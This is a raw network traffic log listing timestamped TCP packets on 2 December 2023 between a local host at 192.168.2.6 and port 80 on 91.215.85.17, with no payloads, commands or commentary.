                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936152935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936350107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936362982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936409950 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936480999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936495066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936506033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936516047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936526060 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936527014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936537981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936547041 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936552048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936563015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936569929 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936573982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936584949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936594963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936599970 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936606884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936614990 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936618090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936629057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936642885 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936650038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936671972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936686993 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936707020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936719894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936729908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936742067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936752081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936779022 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936803102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936815977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936825991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.936845064 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937067986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937079906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937114000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937221050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937233925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937252045 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937262058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937264919 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937272072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937283993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937289953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937292099 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937298059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937308073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937318087 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937329054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937339067 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937339067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937350988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937365055 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937366009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937378883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937380075 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937390089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937401056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937417984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937434912 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937457085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937469006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937478065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937503099 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937541008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937552929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937596083 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937791109 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937802076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937813044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937824011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937834978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937839031 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937845945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937855005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937856913 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937868118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937879086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937891006 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937916040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937958002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937971115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937979937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.937990904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938000917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938004971 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938011885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938023090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938035011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938043118 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938047886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938065052 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938079119 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938086987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938117027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938128948 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938143969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938179016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938189983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938203096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938214064 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938240051 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938263893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938275099 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938301086 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938461065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938472986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938483953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938493013 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938494921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938505888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938518047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938527107 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938529015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938539028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938549995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938555956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938572884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938575029 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938595057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938596964 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938635111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938657045 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938668966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938714027 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938724041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938766003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938779116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938806057 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938818932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938831091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938842058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938853979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938863993 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938863993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938883066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938884974 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938909054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938921928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938935041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938958883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.938990116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939001083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939021111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939038992 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939060926 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939084053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939095974 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939105988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939131975 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939215899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939228058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939239025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939249992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939251900 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939280987 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939295053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939330101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939337969 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939342976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939353943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939373970 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939412117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939424038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939434052 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939444065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939486027 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939486027 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939527035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939562082 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939591885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939604044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939614058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939639091 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939651012 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939661980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939688921 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939696074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939707041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939742088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939745903 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939755917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939801931 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939815044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939857006 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939857006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939870119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939879894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939901114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939905882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939932108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939944029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939955950 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939966917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939977884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939990044 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.939999104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940018892 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940056086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940176964 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940176964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940188885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940201044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940212965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940221071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940223932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940237045 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940248013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940249920 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940273046 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940279007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940316916 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940351963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940464973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940478086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940489054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940499067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940510035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940520048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940531015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940541983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940541983 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940557003 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.940577030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.945014000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.131562948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.131591082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.131604910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.131620884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.131633997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.131661892 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.131711006 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.149514914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.149571896 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.149574041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.149588108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.149616003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.149627924 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.149633884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.149676085 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.149692059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.149899006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.149912119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.149934053 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160173893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160208941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160222054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160234928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160268068 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160291910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160346031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160383940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160542011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.160619020 CET804972091.215.85.17192.168.2.6
